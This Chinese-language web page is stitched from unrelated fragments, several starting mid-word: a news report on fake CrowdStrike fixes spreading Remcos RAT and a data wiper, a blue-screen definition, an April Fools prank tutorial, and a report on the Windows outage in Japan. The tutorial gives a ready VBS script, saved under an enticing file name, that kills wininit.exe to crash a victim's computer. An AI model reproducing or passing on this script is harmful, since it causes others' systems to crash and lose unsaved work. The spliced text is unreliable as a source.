上周五因CrowdStrike更新BUG導致全球Windows系統電腦出現大范圍“藍屏”后,該公司發出警告稱,一些網絡犯罪分子開始利用虛假的CrowdStrike更新來傳播惡意軟件。
7月20日(周六),網絡安全研究人員 g0njxa 首次報告了針對 BBVA 銀行客戶的惡意軟件活動,該活動以虛假 CrowdStrike 修補程序更新的形式安裝Remcos RAT惡意軟件。
在該攻擊鏈中,虛假修補程序通過名為portalintranetgrupobbva的釣魚網站傳播,并偽裝成 BBVA Intranet 門戶。涉及分發的名為“crowdstrike-hotfix.zip”的 ZIP 存檔文件中包含一個名為 Hijack Loader(又名 DOILoader 或 IDAT Loader)的惡意軟件加載程序,該加載程序反過來啟動 Remcos RAT 有效載荷。存檔文件還包括一個文本文件 (“instrucciones.txt”),其中包含西班牙語說明,敦促受害者運行可執行文件以從問題中恢復。
偽裝成 CrowdStrike修補程序的惡意軟件加載程序
而在另一起事件中,親伊朗的黑客組織Handala冒充CrowdStrike官方郵件,給以色列公司假裝創建讓Windows系統重新運行的工具,但實際上是在分發數據擦除器。
黑客組織Handala 送的冒充CrowdStrike的網絡釣魚電子郵件
這些電子郵件包括一份虛假更新的PDF說明,以及從文件托管服務下載惡意ZIP存檔的鏈接。此ZIP文件包含一個名為“Crowdstrike.exe”的可執行文件,該文件一旦執行,數據擦除器將被提取到 %Temp% 下的文件夾,并啟動執行數據擦除操作。
CrowdStrike首席執行官George Kurtz提醒廣大企業及用戶,要保持警惕,確保是通過真正的官方渠道來獲得更新并解決問題。
參考來源:
https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/#google_vignette
算機藍屏簡稱BSOD,又叫藍屏死機。藍屏死機提示已經成為Microsoft Windows操作系統標志性的畫面。藍屏死機主要是Microsoft Windows 系列操作系統為保護電腦數據文件不被破壞而強制顯示的屏幕圖像。
愚人節即將來臨,有許多人絞盡腦汁想各種整人辦法。雖然電影《整蠱專家》里面有許多奇葩的惡作劇方法,但是電影源于現實又高于現實,里面有些方法學不來。近期使用計算機學習的小伙伴比較多,今天就用代碼制作一個計算機藍屏。
第一步:右鍵單擊桌面空白位置,新建一個文本文檔,并將“新建文本文檔.txt”重命名為“打開試試.vbs”。
VBS是基于Visual Basic的腳本語言,我們使用vbs代碼實現惡作劇,所以需要將文件后綴名改為“*.vbs”。文件名可以改的吸引人一些,好奇心害死貓。
第二步:右鍵單擊“打開試試.vbs”,選中右鍵菜單中的編輯,打開記事本編輯窗口。將以下代碼復制粘貼到記事本中,同時按下鍵盤上的Ctrl + S鍵保存編輯。
如果想修改提示語句的話,將引號中的中文修改成自己想要的內容即可。
代碼區域:
If MsgBox("你愿意做我的女朋友嗎?",vbYesNo,"提示")=vbyes then
Msgbox "你竟然同意了,好開心!"
Wscript.echo Printer(" ","*","113111111112212111313111513",7)
Function Printer(a1,a2,b,c)
For i=1 to len(b)
b1=Mid(b,i,1)
For j=1 to b1
s=s & " " & a1
n=n + 1
if n=c then
s=s & chr(10)
n=0
End if
Next
a3=a1
a1=a2
a2=a3
Next
Printer=s
End function
Set ws=CreateObject("Sapi.Spvoice")
k="我愛你"
ws.speak k
Else
Msgbox "被拒絕了,真的好傷心!"
Msgbox "由于程序太過傷心,系統即將崩潰!!!",64,"系統提示:"
Set ws=Createobject("wscript.shell")
ws.run "cmd /c start /min taskkill /f /im wininit.exe",0,false
End if
VBS程序介紹:程序起始給對方一個選擇題,如果對方選擇“是”,那么就相安無事,并有文字組合圖片和語音表白“我愛你”提示。如果對方選擇“否”,將會有提示語句,接著計算機進入藍屏。
解決藍屏的辦法只能重啟計算機。請勿亂用這個vbs代碼,以免給他人造成損失。
一旦程序運行該怎么終止呢?千萬不要嘗試關閉窗口來結束程序。
同時按下鍵盤上的Shift + Ctrl + Delete,啟動任務管理器。在任務管理器的進程中找到并選中“wscript.exe”,點擊結束進程就沒事了。
如果喜歡請點擊關注和轉發,有更多計算機小技巧等著你來發現。
月19日,日本東京時間19日13時30分左右開始,日本地區運行微軟視窗(Windows)操作系統的電腦陸續開始出現訪問異常問題。據美國微軟日本子公司確認,安裝了美國網絡安全企業“群集打擊”(CrowdStrike)軟件的計算機上出現了該問題。
據報道,CrowdStrike日本子公司稱,安裝了該公司安全軟件“Falcon”的電腦出現“藍屏”,表明Windows出現訪問異常問題。CrowdStrike日本子公司發言人表示已經意識到這一問題,正在調查原因并考慮對策。據報道,一家使用了CrowdStrike軟件的公司表示,19日13時40分左右,其辦公室電腦陸續出現藍屏,重啟一段時間后又出現藍屏,導致無法工作。
來源:央視新聞
爆料、維權通道:應用市場下載“晨視頻”客戶端,搜索“幫忙”一鍵直達“晨意幫忙”平臺;或撥打熱線0731-85571188。政企內容服務專席19176699651。